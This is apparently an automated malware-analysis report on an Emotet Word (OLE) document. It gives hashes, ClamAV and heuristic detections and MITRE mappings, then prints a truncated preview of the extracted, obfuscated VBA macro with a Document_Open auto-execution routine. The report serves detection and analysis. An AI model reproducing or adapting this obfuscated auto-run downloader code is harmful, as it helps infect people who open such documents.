Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 9d0d36f990055211…

MALICIOUS

Office (OLE)

Size: 177.6 KB
Created: 2019-12-12 06:49:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: 1f33087d89592024e75bd229f7054a6f
SHA-1: 623fbf1df0bbde30cfd79005c9fa3e90235e2d1f
SHA-256: 9d0d36f990055211037b5df654cec57d522f32ef6c37c40d2a649d8a30bb0808
Risk Score: 202

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for Emotet. The ClamAV detection explicitly names Emotet. The obfuscated VBA code likely attempts to download and execute a second-stage payload, a hallmark of Emotet's downloader functionality.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-7447388-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7447388-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open auto-execution macro: runs as soon as the document is opened with macros enabled
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Macro code calls CreateObject
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body; this is the standard DrawingML XML namespace identifier, not a download location)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8795 bytes
SHA-256: e0e3eb9a1480364c8dea8a6196ffcb26c0d93e7a1f7dc790d831f7cc3f008ea7

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Lybqoogsdhw"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Cienkxwpvfebq, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   For Hlnjwdhwyqrgn = Izdprgoelwdy To 0
      For Rbmsryfk = Dhzxckniuilj To 0
         Prtgbnsfu = (23 + Round(WOJOkxR3))
      Next
      Ofowxnxrl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Gqbbivedri = uzH To MZDUoaj1
         Dzfyiuzym = ChrB(dANsZ68a4)
         Next
      For Nezmwunrcvf = 0 To 0
         Eaexbqcy = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Dofkwobhnjs = Rgouokauq To 0
      For Mvnwfqsblwmn = Fdumpvmfolkof To 0
         Utnlmxbbecxq = (23 + Round(WOJOkxR3))
      Next
      Jesxxihg = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Igggbmqk = uzH To MZDUoaj1
         Rdzcezebp = ChrB(dANsZ68a4)
         Next
      For Evcfgrrhgnnl = 0 To 0
         Gqvzrlmn = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Zcwpxanwc = Liictgefpd To 0
      For Zrlckotgbjmrs = Grlfkfcqk To 0
         Aqgapdmgwxmyc = (23 + Round(WOJOkxR3))
      Next
      Nibvqkazyo = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Crxaarlnczatj = uzH To MZDUoaj1
         Wittixbrto = ChrB(dANsZ68a4)
         Next
      For Oaqhmlgjozwl = 0 To 0
         Ufoiimlydre = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Nlllsalbwscg
End Sub

Attribute VB_Name = "Fdktbacaoogfd"
Attribute VB_Base = "0{2CE796BC-315F-490A-A1BF-FE393A0F89CC}{005C3DCB-A0AF-4E3D-AC1A-2CE7964EBA6E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Fuqosmjgrsnid"
Function Ldlexyte()
   For Yxcgphts = Ugjmkcrcfrv To 0
      For Fhzhmcqedog = Eqdxovrbtimgm To 0
         Awqhliwzpahp = (23 + Round(WOJOkxR3))
      Next
      Rsdgmxayhc = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Mmznazryegxy = uzH To MZDUoaj1
         Hqnxhgsqcpj = ChrB(dANsZ68a4)
         Next
      For Nrbpniqv = 0 To 0
         Czhyahkv = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Hvdzmohxgrs = Lybqoogsdhw.Cienkxwpvfebq
   For Nzeyjqdcenou = Blgbziln To 0
      For Htmrhuuokfyl = Gimtbnyrwypi To 0
         Msfaimqpelvks = (23 + Round(WOJOkxR3))
      Next
      Qeqcmvqwsl = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Pxncycxbrzyd = uzH To MZDUoaj1
         Qdayrvxi = ChrB(dANsZ68a4)
         Next
      For Ygfbwwnoetbs = 0 To 0
         Xiuyrqgnfi = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Eddiblqzt = Hvdzmohxgrs + Fdktbacaoogfd.Urmsbswtr + Fdktbacaoogfd.Ishapsxghjg + Fdktbacaoogfd.Cfidacdylj
   For Ycgukqwaroiwa = Bdyqmpjywbl To 0
      For Uwjkrwmfpv = Vqjlnxsfqff To 0
         Zgoektzhmfufy = (23 + Round(WOJOkxR3))
      Next
      Whlhgarz = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Idscuprkmr = uzH To MZDUoaj1
         Bfcsijkogpspj = ChrB(dANsZ68a4)
         Next
      For Xsyihorbqhfr = 0 To 0
         Umnnyfgf = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Ekalgrwwelf = Eddiblqzt + Fdktbacaoogfd.Nlnpekfzejxq + Fdktbacaoogfd.Sxvcssgvjusk.ControlTipText
   For Hqlzcifbw = Lydqkxcpq To 0
      For Dxlgrpvp = Emuyewxnleela To 0
         Isysejgh = (23 + Round(WOJOkxR3))
      Next
      Onwrpfhqlgm = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Fafcfvyrxndi = uzH To MZDUoaj1
         Wbmyfplqibwvy = ChrB(dANsZ68a4)
         Next
      For Orqyatrzhalf = 0 To 0
         Zsisjkozihu = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Ldlexyte = Ilysyduuew + Ekalgrwwelf + Ilysyduuew
   For Rfcqhhhvuyu = Nqzijhok To 0

... (truncated)